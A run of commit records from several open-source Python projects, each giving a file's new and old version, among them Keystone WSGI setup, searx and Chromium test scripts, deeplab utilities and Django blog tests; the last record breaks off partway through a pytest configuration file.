conf = CONF.config_file[0]
name = os.path.basename(__file__)
if CONF.debug:
CONF.log_opt_values(logging.getLogger(CONF.prog), logging.DEBUG)
options = deploy.appconfig('config:%s' % CONF.config_file[0])
application = deploy.loadapp('config:%s' % conf, name=name)
| import os
from paste import deploy
from keystone import config
from keystone.common import logging
LOG = logging.getLogger(__name__)
CONF = config.CONF
config_files = ['/etc/keystone.conf']
CONF(config_files=config_files)
conf = CONF.config_file[0]
name = os.path.basename(__file__)
if CONF.debug:
CONF.log_opt_values(logging.getLogger(CONF.prog), logging.DEBUG)
options = deploy.appconfig('config:%s' % CONF.config_file[0])
application = deploy.loadapp('config:%s' % conf, name=name)
| apache-2.0 | Python |
8eea594e684053a7fbfe1f2f946343cf809be058 | Rename server tests | posterior/treecat,posterior/treecat | treecat/serving_test.py | treecat/serving_test.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
import pytest
from treecat.serving import TreeCatServer
from treecat.testutil import TINY_CONFIG
from treecat.testutil import TINY_DATA
from treecat.testutil import TINY_MASK
from treecat.training import train_model
@pytest.fixture(scope='module')
def model():
return train_model(TINY_DATA, TINY_MASK, TINY_CONFIG)
def test_server_init(model):
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
server._get_session(7)
def test_server_sample_shape(model):
N, V = TINY_DATA.shape
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# Sample all possible mask patterns.
factors = [[True, False]] * V
for mask in itertools.product(*factors):
mask = np.array(mask, dtype=np.bool_)
samples = server.sample(TINY_DATA, mask)
assert samples.shape == TINY_DATA.shape
assert samples.dtype == TINY_DATA.dtype
assert np.allclose(samples[:, mask], TINY_DATA[:, mask])
def test_server_logprob_shape(model):
N, V = TINY_DATA.shape
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# Sample all possible mask patterns.
factors = [[True, False]] * V
for mask in itertools.product(*factors):
mask = np.array(mask, dtype=np.bool_)
logprob = server.logprob(TINY_DATA, mask)
assert logprob.shape == (N, )
assert np.isfinite(logprob).all()
assert (logprob < 0.0).all() # Assuming features are discrete.
@pytest.mark.xfail
def test_server_logprob_is_normalized(model):
N, V = TINY_DATA.shape
C = TINY_CONFIG['num_categories']
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# The total probability of all possible rows should be 1.
factors = [range(C)] * V
data = np.array(list(itertools.product(*factors)), dtype=np.int32)
mask = np.array([True] * V, dtype=np.bool_)
logprob = server.logprob(data, mask)
total = np.exp(np.logaddexp.reduce(logprob))
assert abs(total - 1.0) < 1e-6, total
| from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
import pytest
from treecat.serving import TreeCatServer
from treecat.testutil import TINY_CONFIG
from treecat.testutil import TINY_DATA
from treecat.testutil import TINY_MASK
from treecat.training import train_model
@pytest.fixture(scope='module')
def model():
return train_model(TINY_DATA, TINY_MASK, TINY_CONFIG)
def test_server_init(model):
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
server._get_session(7)
def test_server_sample(model):
N, V = TINY_DATA.shape
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# Sample all possible mask patterns.
factors = [[True, False]] * V
for mask in itertools.product(*factors):
mask = np.array(mask, dtype=np.bool_)
samples = server.sample(TINY_DATA, mask)
assert samples.shape == TINY_DATA.shape
assert samples.dtype == TINY_DATA.dtype
assert np.allclose(samples[:, mask], TINY_DATA[:, mask])
def test_server_logprob(model):
N, V = TINY_DATA.shape
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# Sample all possible mask patterns.
factors = [[True, False]] * V
for mask in itertools.product(*factors):
mask = np.array(mask, dtype=np.bool_)
logprob = server.logprob(TINY_DATA, mask)
assert logprob.shape == (N, )
assert np.isfinite(logprob).all()
assert (logprob < 0.0).all() # Assuming features are discrete.
@pytest.mark.xfail
def test_server_logprob_total(model):
N, V = TINY_DATA.shape
C = TINY_CONFIG['num_categories']
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
factors = [range(C)] * V
data = np.array(list(itertools.product(*factors)), dtype=np.int32)
mask = np.array([True] * V, dtype=np.bool_)
logprob = server.logprob(data, mask)
total = np.exp(np.logaddexp.reduce(logprob))
assert abs(total - 1.0) < 1e-6, total
| apache-2.0 | Python |
671ca30892e3ebeb0a9140f95690853b4b92dc02 | Fix reverse since we deprecated post_object_list | praekelt/jmbo-post,praekelt/jmbo-post | post/views.py | post/views.py | from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from post.models import Post
from jmbo.generic.views import GenericObjectDetail, GenericObjectList
from jmbo.view_modifiers import DefaultViewModifier
class ObjectList(GenericObjectList):
def get_extra_context(self, *args, **kwargs):
return {'title': _('Posts')}
def get_view_modifier(self, request, *args, **kwargs):
return DefaultViewModifier(request, *args, **kwargs)
def get_paginate_by(self, *args, **kwargs):
return 12
def get_queryset(self, *args, **kwargs):
return Post.permitted.all()
object_list = ObjectList()
class ObjectDetail(GenericObjectDetail):
def get_queryset(self, *args, **kwargs):
return Post.permitted.all()
def get_extra_context(self, *args, **kwargs):
return {'title': 'Posts'}
def get_view_modifier(self, request, *args, **kwargs):
return DefaultViewModifier(
request,
base_url=reverse("object_list", args=['post', 'post']),
ignore_defaults=True,
*args,
**kwargs
)
object_detail = ObjectDetail()
| from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from post.models import Post
from jmbo.generic.views import GenericObjectDetail, GenericObjectList
from jmbo.view_modifiers import DefaultViewModifier
class ObjectList(GenericObjectList):
def get_extra_context(self, *args, **kwargs):
return {'title': _('Posts')}
def get_view_modifier(self, request, *args, **kwargs):
return DefaultViewModifier(request, *args, **kwargs)
def get_paginate_by(self, *args, **kwargs):
return 12
def get_queryset(self, *args, **kwargs):
return Post.permitted.all()
object_list = ObjectList()
class ObjectDetail(GenericObjectDetail):
def get_queryset(self, *args, **kwargs):
return Post.permitted.all()
def get_extra_context(self, *args, **kwargs):
return {'title': 'Posts'}
def get_view_modifier(self, request, *args, **kwargs):
return DefaultViewModifier(
request,
base_url=reverse("post_object_list"),
ignore_defaults=True,
*args,
**kwargs
)
object_detail = ObjectDetail()
| bsd-3-clause | Python |
a03c61430abac8cac5e522a3bf391175cd261cec | fix tests | zblz/naima,cdeil/naima,cdeil/naima | gammafit/tests/test_onezone.py | gammafit/tests/test_onezone.py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
from astropy import units as u
import numpy as np
from numpy.testing import assert_approx_equal
electronozmpars={
'seedspec':'CMB',
'index':2.0,
'cutoff':1e13,
'beta':1.0,
'ngamd':100,
'gmin':1e4,
'gmax':1e10,
}
def test_electronozm():
from ..onezone import ElectronOZM
ozm = ElectronOZM( np.logspace(0,15,1000), 1, **electronozmpars)
ozm.calc_outspec()
lsy=np.trapz(ozm.specsy*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lsy,0.016769058688230903)
lic=np.trapz(ozm.specic*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lic,214080823.28721327)
#def test_electronozm_evolve():
#from ..onezone import ElectronOZM
#ozm = ElectronOZM( np.logspace(0,15,1000), 1, evolve_nelec=True, **electronozmpars)
#ozm.calc_outspec()
#lsy=np.trapz(ozm.specsy*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
#assert_approx_equal(lsy,5718447729.5694494)
#lic=np.trapz(ozm.specic*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
#assert_approx_equal(lic,1.0514223815442389e+20)
def test_protonozm():
from ..onezone import ProtonOZM
ozm = ProtonOZM( np.logspace(8,15,100), 1, index=2.0,cutoff=1e13,beta=1.0)
ozm.calc_outspec()
lpp=np.trapz(ozm.specpp*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lpp,3.2800253974151616e-4, significant=5)
| # Licensed under a 3-clause BSD style license - see LICENSE.rst
from astropy import units as u
import numpy as np
from numpy.testing import assert_approx_equal
electronozmpars={
'seedspec':'CMB',
'index':2.0,
'cutoff':1e13,
'beta':1.0,
'ngamd':100,
'gmin':1e4,
'gmax':1e10,
}
def test_electronozm():
from ..onezone import ElectronOZM
ozm = ElectronOZM( np.logspace(0,15,1000), 1, **electronozmpars)
ozm.calc_outspec()
lsy=np.trapz(ozm.specsy*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lsy,0.016769058688230903)
lic=np.trapz(ozm.specic*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lic,214080823.28721327)
def test_electronozm_evolve():
from ..onezone import ElectronOZM
ozm = ElectronOZM( np.logspace(0,15,1000), 1, evolve_nelec=True, **electronozmpars)
ozm.calc_outspec()
lsy=np.trapz(ozm.specsy*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lsy,5718447729.5694494)
lic=np.trapz(ozm.specic*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lic,1.0514223815442389e+20)
def test_protonozm():
from ..onezone import ProtonOZM
ozm = ProtonOZM( np.logspace(8,15,100), 1, index=2.0,cutoff=1e13,beta=1.0)
ozm.calc_outspec()
lpp=np.trapz(ozm.specpp*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lpp,3.2800627079738687e+23, significant=5)
| bsd-3-clause | Python |
74e4e5e507d908950d4458dff5ba4aa5c712866f | Allow localization of "Self Informations" | dalf/searx,dalf/searx,dalf/searx,asciimoo/searx,asciimoo/searx,dalf/searx,asciimoo/searx,asciimoo/searx | searx/plugins/self_info.py | searx/plugins/self_info.py | '''
searx is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
searx is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with searx. If not, see < http://www.gnu.org/licenses/ >.
(C) 2015 by Adam Tauber, <[email protected]>
'''
from flask_babel import gettext
import re
name = gettext('Self Informations')
description = gettext('Displays your IP if the query is "ip" and your user agent if the query contains "user agent".')
default_on = True
# Self User Agent regex
p = re.compile(b'.*user[ -]agent.*', re.IGNORECASE)
# attach callback to the post search hook
# request: flask request object
# ctx: the whole local context of the pre search hook
def post_search(request, search):
if search.search_query.pageno > 1:
return True
if search.search_query.query == b'ip':
x_forwarded_for = request.headers.getlist("X-Forwarded-For")
if x_forwarded_for:
ip = x_forwarded_for[0]
else:
ip = request.remote_addr
search.result_container.answers['ip'] = {'answer': ip}
elif p.match(search.search_query.query):
ua = request.user_agent
search.result_container.answers['user-agent'] = {'answer': ua}
return True
| '''
searx is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
searx is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with searx. If not, see < http://www.gnu.org/licenses/ >.
(C) 2015 by Adam Tauber, <[email protected]>
'''
from flask_babel import gettext
import re
name = "Self Informations"
description = gettext('Displays your IP if the query is "ip" and your user agent if the query contains "user agent".')
default_on = True
# Self User Agent regex
p = re.compile(b'.*user[ -]agent.*', re.IGNORECASE)
# attach callback to the post search hook
# request: flask request object
# ctx: the whole local context of the pre search hook
def post_search(request, search):
if search.search_query.pageno > 1:
return True
if search.search_query.query == b'ip':
x_forwarded_for = request.headers.getlist("X-Forwarded-For")
if x_forwarded_for:
ip = x_forwarded_for[0]
else:
ip = request.remote_addr
search.result_container.answers['ip'] = {'answer': ip}
elif p.match(search.search_query.query):
ua = request.user_agent
search.result_container.answers['user-agent'] = {'answer': ua}
return True
| agpl-3.0 | Python |
d04ded85e01c4a9e0960d57a37ecd83fc92fa5cd | Add a fallback to mini_installer_tests' quit_chrome.py exit logic. | jaruba/chromium.src,Jonekee/chromium.src,fujunwei/chromium-crosswalk,dednal/chromium.src,fujunwei/chromium-crosswalk,chuan9/chromium-crosswalk,ondra-novak/chromium.src,mohamed--abdel-maksoud/chromium.src,mohamed--abdel-maksoud/chromium.src,Pluto-tv/chromium-crosswalk,markYoungH/chromium.src,fujunwei/chromium-crosswalk,bright-sparks/chromium-spacewalk,PeterWangIntel/chromium-crosswalk,krieger-od/nwjs_chromium.src,bright-sparks/chromium-spacewalk,hgl888/chromium-crosswalk,Just-D/chromium-1,markYoungH/chromium.src,Pluto-tv/chromium-crosswalk,M4sse/chromium.src,dednal/chromium.src,hgl888/chromium-crosswalk-efl,ltilve/chromium,Chilledheart/chromium,TheTypoMaster/chromium-crosswalk,patrickm/chromium.src,patrickm/chromium.src,chuan9/chromium-crosswalk,Jonekee/chromium.src,Fireblend/chromium-crosswalk,markYoungH/chromium.src,hgl888/chromium-crosswalk-efl,Fireblend/chromium-crosswalk,dednal/chromium.src,dednal/chromium.src,dednal/chromium.src,markYoungH/chromium.src,jaruba/chromium.src,bright-sparks/chromium-spacewalk,M4sse/chromium.src,axinging/chromium-crosswalk,Just-D/chromium-1,dushu1203/chromium.src,bright-sparks/chromium-spacewalk,axinging/chromium-crosswalk,ltilve/chromium,anirudhSK/chromium,ondra-novak/chromium.src,dednal/chromium.src,M4sse/chromium.src,littlstar/chromium.src,Fireblend/chromium-crosswalk,dednal/chromium.src,TheTypoMaster/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,dednal/chromium.src,bright-sparks/chromium-spacewalk,crosswalk-project/chromium-crosswalk-efl,hgl888/chromium-crosswalk-efl,axinging/chromium-crosswalk,ondra-novak/chromium.src,M4sse/chromium.src,Jonekee/chromium.src,chuan9/chromium-crosswalk,bright-sparks/chromium-spacewalk,krieger-od/nwjs_chromium.src,crosswalk-project/chromium-crosswalk-efl,Jonekee/chromium.src,axinging/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,krieger-od/nwjs_chromium.src,ltilve/chromium,M4sse/chromium.src,hgl888/chromium-crosswalk-efl,ondra-novak/chromium.src,Chilledheart/chromium,crosswalk-project/chromium-crosswalk-efl,dushu1203/chromium.src,hgl888/chromium-crosswalk-efl,jaruba/chromium.src,hgl888/chromium-crosswalk,anirudhSK/chromium,axinging/chromium-crosswalk,littlstar/chromium.src,Pluto-tv/chromium-crosswalk,Chilledheart/chromium,krieger-od/nwjs_chromium.src,patrickm/chromium.src,dushu1203/chromium.src,Pluto-tv/chromium-crosswalk,jaruba/chromium.src,PeterWangIntel/chromium-crosswalk,dushu1203/chromium.src,axinging/chromium-crosswalk,fujunwei/chromium-crosswalk,Pluto-tv/chromium-crosswalk,hgl888/chromium-crosswalk,littlstar/chromium.src,Just-D/chromium-1,krieger-od/nwjs_chromium.src,anirudhSK/chromium,jaruba/chromium.src,dushu1203/chromium.src,krieger-od/nwjs_chromium.src,Chilledheart/chromium,dushu1203/chromium.src,PeterWangIntel/chromium-crosswalk,Fireblend/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,M4sse/chromium.src,markYoungH/chromium.src,Jonekee/chromium.src,fujunwei/chromium-crosswalk,chuan9/chromium-crosswalk,littlstar/chromium.src,axinging/chromium-crosswalk,M4sse/chromium.src,anirudhSK/chromium,anirudhSK/chromium,PeterWangIntel/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,axinging/chromium-crosswalk,Chilledheart/chromium,TheTypoMaster/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,Jonekee/chromium.src,TheTypoMaster/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,dednal/chromium.src,Fireblend/chromium-crosswalk,krieger-od/nwjs_chromium.src,M4sse/chromium.src,M4sse/chromium.src,fujunwei/chromium-crosswalk,patrickm/chromium.src,crosswalk-project/chromium-crosswalk-efl,Just-D/chromium-1,krieger-od/nwjs_chromium.src,krieger-od/nwjs_chromium.src,bright-sparks/chromium-spacewalk,hgl888/chromium-crosswalk,ondra-novak/chromium.src,crosswalk-project/chromium-crosswalk-efl,ltilve/chromium,Fireblend/chromium-crosswalk,patrickm/chromium.src,anirudhSK/chromium,Jonekee/chromium.src,anirudhSK/chromium,mohamed--abdel-maksoud/chromium.src,bright-sparks/chromium-spacewalk,Just-D/chromium-1,dushu1203/chromium.src,Jonekee/chromium.src,dednal/chromium.src,ondra-novak/chromium.src,krieger-od/nwjs_chromium.src,jaruba/chromium.src,Just-D/chromium-1,ondra-novak/chromium.src,Chilledheart/chromium,mohamed--abdel-maksoud/chromium.src,ondra-novak/chromium.src,fujunwei/chromium-crosswalk,jaruba/chromium.src,markYoungH/chromium.src,littlstar/chromium.src,ltilve/chromium,littlstar/chromium.src,markYoungH/chromium.src,axinging/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,ltilve/chromium,dushu1203/chromium.src,dednal/chromium.src,littlstar/chromium.src,ltilve/chromium,axinging/chromium-crosswalk,Pluto-tv/chromium-crosswalk,Fireblend/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,hgl888/chromium-crosswalk-efl,M4sse/chromium.src,Chilledheart/chromium,hgl888/chromium-crosswalk-efl,markYoungH/chromium.src,hgl888/chromium-crosswalk-efl,Chilledheart/chromium,jaruba/chromium.src,Jonekee/chromium.src,chuan9/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,littlstar/chromium.src,mohamed--abdel-maksoud/chromium.src,dushu1203/chromium.src,Jonekee/chromium.src,ondra-novak/chromium.src,Fireblend/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,anirudhSK/chromium,patrickm/chromium.src,jaruba/chromium.src,hgl888/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,Fireblend/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,anirudhSK/chromium,Chilledheart/chromium,markYoungH/chromium.src,hgl888/chromium-crosswalk,hgl888/chromium-crosswalk,Just-D/chromium-1,ltilve/chromium,axinging/chromium-crosswalk,chuan9/chromium-crosswalk,patrickm/chromium.src,hgl888/chromium-crosswalk,jaruba/chromium.src,chuan9/chromium-crosswalk,anirudhSK/chromium,mohamed--abdel-maksoud/chromium.src,krieger-od/nwjs_chromium.src,markYoungH/chromium.src,Pluto-tv/chromium-crosswalk,markYoungH/chromium.src,bright-sparks/chromium-spacewalk,Jonekee/chromium.src,dushu1203/chromium.src,patrickm/chromium.src,crosswalk-project/chromium-crosswalk-efl,hgl888/chromium-crosswalk-efl,chuan9/chromium-crosswalk,dushu1203/chromium.src,ltilve/chromium,crosswalk-project/chromium-crosswalk-efl,TheTypoMaster/chromium-crosswalk,anirudhSK/chromium,jaruba/chromium.src,mohamed--abdel-maksoud/chromium.src,mohamed--abdel-maksoud/chromium.src,fujunwei/chromium-crosswalk,M4sse/chromium.src,Just-D/chromium-1,Pluto-tv/chromium-crosswalk,anirudhSK/chromium,hgl888/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,Pluto-tv/chromium-crosswalk,hgl888/chromium-crosswalk-efl,Just-D/chromium-1,patrickm/chromium.src,chuan9/chromium-crosswalk,fujunwei/chromium-crosswalk | chrome/test/mini_installer/quit_chrome.py | chrome/test/mini_installer/quit_chrome.py | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Quits Chrome.
This script sends a WM_CLOSE message to each window of Chrome and waits until
the process terminates.
"""
import optparse
import os
import pywintypes
import sys
import time
import win32con
import win32gui
import winerror
import chrome_helper
def CloseWindows(process_path):
"""Closes all windows owned by processes whose exe path is |process_path|.
Args:
process_path: The path to the executable whose processes will have their
windows closed.
Returns:
A boolean indicating whether the processes successfully terminated within
25 seconds.
"""
start_time = time.time()
while time.time() - start_time < 25:
process_ids = chrome_helper.GetProcessIDs(process_path)
if not process_ids:
return True
for hwnd in chrome_helper.GetWindowHandles(process_ids):
try:
win32gui.PostMessage(hwnd, win32con.WM_CLOSE, 0, 0)
except pywintypes.error as error:
# It's normal that some window handles have become invalid.
if error.args[0] != winerror.ERROR_INVALID_WINDOW_HANDLE:
raise
time.sleep(0.1)
return False
def KillNamedProcess(process_path):
""" Kills all running exes with the same name as the exe at |process_path|.
Args:
process_path: The path to an executable.
Returns:
True if running executables were successfully killed. False otherwise.
"""
return os.system('taskkill /f /im %s' % os.path.basename(process_path)) == 0
def main():
usage = 'usage: %prog chrome_path'
parser = optparse.OptionParser(usage, description='Quit Chrome.')
_, args = parser.parse_args()
if len(args) != 1:
parser.error('Incorrect number of arguments.')
chrome_path = args[0]
if not CloseWindows(chrome_path):
# TODO(robertshield): Investigate why Chrome occasionally doesn't shut down.
print 'Warning: Chrome not responding to window closure. Killing process...'
KillNamedProcess(chrome_path):
return 0
if __name__ == '__main__':
sys.exit(main())
| # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Quits Chrome.
This script sends a WM_CLOSE message to each window of Chrome and waits until
the process terminates.
"""
import optparse
import pywintypes
import sys
import time
import win32con
import win32gui
import winerror
import chrome_helper
def CloseWindows(process_path):
"""Closes all windows owned by processes whose path is |process_path|.
Args:
process_path: The path to the process.
Returns:
A boolean indicating whether the processes successfully terminate within
30 seconds.
"""
start_time = time.time()
while time.time() - start_time < 30:
process_ids = chrome_helper.GetProcessIDs(process_path)
if not process_ids:
return True
for hwnd in chrome_helper.GetWindowHandles(process_ids):
try:
win32gui.PostMessage(hwnd, win32con.WM_CLOSE, 0, 0)
except pywintypes.error as error:
# It's normal that some window handles have become invalid.
if error.args[0] != winerror.ERROR_INVALID_WINDOW_HANDLE:
raise
time.sleep(0.1)
return False
def main():
usage = 'usage: %prog chrome_path'
parser = optparse.OptionParser(usage, description='Quit Chrome.')
_, args = parser.parse_args()
if len(args) != 1:
parser.error('Incorrect number of arguments.')
chrome_path = args[0]
if not CloseWindows(chrome_path):
raise Exception('Could not quit Chrome.')
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | Python |
2d55d95c623bef4848131878061887854ff8a971 | Update utils.py | ALISCIFP/tensorflow-resnet-segmentation,nasatony/deeplab_resnet,DrSleep/tensorflow-deeplab-resnet,ALISCIFP/tensorflow-resnet-segmentation | deeplab_resnet/utils.py | deeplab_resnet/utils.py | from PIL import Image
import numpy as np
import tensorflow as tf
n_classes = 21
# colour map
label_colours = [(0,0,0)
# 0=background
,(128,0,0),(0,128,0),(128,128,0),(0,0,128),(128,0,128)
# 1=aeroplane, 2=bicycle, 3=bird, 4=boat, 5=bottle
,(0,128,128),(128,128,128),(64,0,0),(192,0,0),(64,128,0)
# 6=bus, 7=car, 8=cat, 9=chair, 10=cow
,(192,128,0),(64,0,128),(192,0,128),(64,128,128),(192,128,128)
# 11=diningtable, 12=dog, 13=horse, 14=motorbike, 15=person
,(0,64,0),(128,64,0),(0,192,0),(128,192,0),(0,64,128)]
# 16=potted plant, 17=sheep, 18=sofa, 19=train, 20=tv/monitor
def decode_labels(mask):
"""Decode batch of segmentation masks.
Args:
label_batch: result of inference after taking argmax.
Returns:
An batch of RGB images of the same size
"""
img = Image.new('RGB', (len(mask[0]), len(mask)))
pixels = img.load()
for j_, j in enumerate(mask):
for k_, k in enumerate(j):
if k < n_classes:
pixels[k_,j_] = label_colours[k]
return np.array(img)
def prepare_label(input_batch, new_size):
"""Resize masks and perform one-hot encoding.
Args:
input_batch: input tensor of shape [batch_size H W 1].
new_size: a tensor with new height and width.
Returns:
Outputs a tensor of shape [batch_size h w 21]
with last dimension comprised of 0's and 1's only.
"""
with tf.name_scope('label_encode'):
input_batch = tf.image.resize_nearest_neighbor(input_batch, new_size) # as labels are integer numbers, need to use NN interp.
input_batch = tf.squeeze(input_batch, squeeze_dims=[3]) # reducing the channel dimension.
input_batch = tf.one_hot(input_batch, depth=n_classes)
return input_batch
| from PIL import Image
import numpy as np
# colour map
label_colours = [(0,0,0)
# 0=background
,(128,0,0),(0,128,0),(128,128,0),(0,0,128),(128,0,128)
# 1=aeroplane, 2=bicycle, 3=bird, 4=boat, 5=bottle
,(0,128,128),(128,128,128),(64,0,0),(192,0,0),(64,128,0)
# 6=bus, 7=car, 8=cat, 9=chair, 10=cow
,(192,128,0),(64,0,128),(192,0,128),(64,128,128),(192,128,128)
# 11=diningtable, 12=dog, 13=horse, 14=motorbike, 15=person
,(0,64,0),(128,64,0),(0,192,0),(128,192,0),(0,64,128)]
# 16=potted plant, 17=sheep, 18=sofa, 19=train, 20=tv/monitor
def decode_labels(mask):
"""Decode batch of segmentation masks.
Args:
label_batch: result of inference after taking argmax.
Returns:
An batch of RGB images of the same size
"""
img = Image.new('RGB', (len(mask[0]), len(mask)))
pixels = img.load()
for j_, j in enumerate(mask):
for k_, k in enumerate(j):
if k < 21:
pixels[k_,j_] = label_colours[k]
return np.array(img)
def prepare_label(input_batch, new_size):
"""Resize masks and perform one-hot encoding.
Args:
input_batch: input tensor of shape [batch_size H W 1].
new_size: a tensor with new height and width.
Returns:
Outputs a tensor of shape [batch_size h w 21]
with last dimension comprised of 0's and 1's only.
"""
with tf.name_scope('label_encode'):
input_batch = tf.image.resize_nearest_neighbor(input_batch, new_size) # as labels are integer numbers, need to use NN interp.
input_batch = tf.squeeze(input_batch, squeeze_dims=[3]) # reducing the channel dimension.
input_batch = tf.one_hot(input_batch, depth=n_classes)
return input_batch
| mit | Python |
a62b5955d9801f25736c42545191ff5a76a2e5b1 | Refactor UserFactory and add CommentFactory | andreagrandi/bloggato,andreagrandi/bloggato | blog/tests.py | blog/tests.py | from django.test import TestCase
from .models import BlogPost, Comment
from django.contrib.auth.models import User
class UserFactory(object):
def create(self, username="user001", email="[email protected]", password="password123456"):
user = User.objects.create_user(username = username, email = email, password = password)
return user
class BlogPostFactory(object):
def create(self, save=False):
blogpost = BlogPost()
blogpost.user = UserFactory().create()
blogpost.title = "Title Test"
blogpost.text = "Lorem ipsum tarapia tapioco..."
if save==True:
blogpost.save()
return blogpost
class CommentFactory(object):
def create(self, blogpost, text="Test comment", save=False):
comment = Comment()
comment.post = blogpost
comment.user = UserFactory().create("user002", "[email protected]", "password123456")
comment.text = text
if save==True:
comment.save()
return comment
class BlogTest(TestCase):
def setUp(self):
pass
def test_post_creation(self):
blogpost = BlogPostFactory().create(True)
self.assertTrue(blogpost.id > 0, "BlogPost created correctly")
def test_post_update(self):
blogpost = BlogPostFactory().create(True)
self.assertTrue(blogpost.id > 0, "BlogPost created correctly")
blogpost.title = "Title Test - modified"
blogpost.save()
blogpost_id = blogpost.id
blogpost_saved = BlogPost.objects.get(id = blogpost_id)
self.assertEquals(blogpost_saved.title, blogpost.title, "BlogPost updated correctly")
def test_post_delete(self):
blogpost = BlogPostFactory().create(True)
blogpost_id = blogpost.id
blogpost.delete()
blogpost_saved = BlogPost.objects.filter(id = blogpost_id)
self.assertEqual(blogpost_saved.count(), 0, "BlogPost deleted correctly")
| from django.test import TestCase
from .models import BlogPost
from django.contrib.auth.models import User
class UserFactory(object):
def create(self):
user = User.objects.create_user(username = "user001", email = "[email protected]", password = "password123456")
return user
class BlogPostFactory(object):
def create(self, save=False):
blogpost = BlogPost()
blogpost.user = UserFactory().create()
blogpost.title = "Title Test"
blogpost.text = "Lorem ipsum tarapia tapioco..."
if save==True:
blogpost.save()
return blogpost
class BlogTest(TestCase):
def setUp(self):
pass
def test_post_creation(self):
blogpost = BlogPostFactory().create(True)
self.assertTrue(blogpost.id > 0, "BlogPost created correctly")
def test_post_update(self):
blogpost = BlogPostFactory().create(True)
self.assertTrue(blogpost.id > 0, "BlogPost created correctly")
blogpost.title = "Title Test - modified"
blogpost.save()
blogpost_id = blogpost.id
blogpost_saved = BlogPost.objects.get(id = blogpost_id)
self.assertEquals(blogpost_saved.title, blogpost.title, "BlogPost updated correctly")
def test_post_delete(self):
blogpost = BlogPostFactory().create(True)
blogpost_id = blogpost.id
blogpost.delete()
blogpost_saved = BlogPost.objects.filter(id = blogpost_id)
self.assertEqual(blogpost_saved.count(), 0, "BlogPost deleted correctly")
| mit | Python |
420d104d9e674b96363db5c986ea9eea4d411c92 | Add updated template settings to conftests | st8st8/django-organizations,st8st8/django-organizations,bennylope/django-organizations,bennylope/django-organizations | conftest.py | conftest.py | """
Configuration file for py.test
"""
import django
def pytest_configure():
from django.conf import settings
settings.configure(
DEBUG=True,
USE_TZ=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "test.sqlite3",
}
},
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
# The ordering here, the apps using the organization base models
# first and *then* the organizations app itself is an implicit test
# that the organizations app need not be installed in order to use
# its base models.
"test_accounts",
"test_vendors",
"organizations",
"test_custom",
],
MIDDLEWARE_CLASSES=[],
SITE_ID=1,
FIXTURE_DIRS=['tests/fixtures'],
ORGS_SLUGFIELD='autoslug.AutoSlugField',
ROOT_URLCONF="tests.urls",
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
},
]
)
django.setup()
| """
Configuration file for py.test
"""
import django
def pytest_configure():
from django.conf import settings
settings.configure(
DEBUG=True,
USE_TZ=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "test.sqlite3",
}
},
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
# The ordering here, the apps using the organization base models
# first and *then* the organizations app itself is an implicit test
# that the organizations app need not be installed in order to use
# its base models.
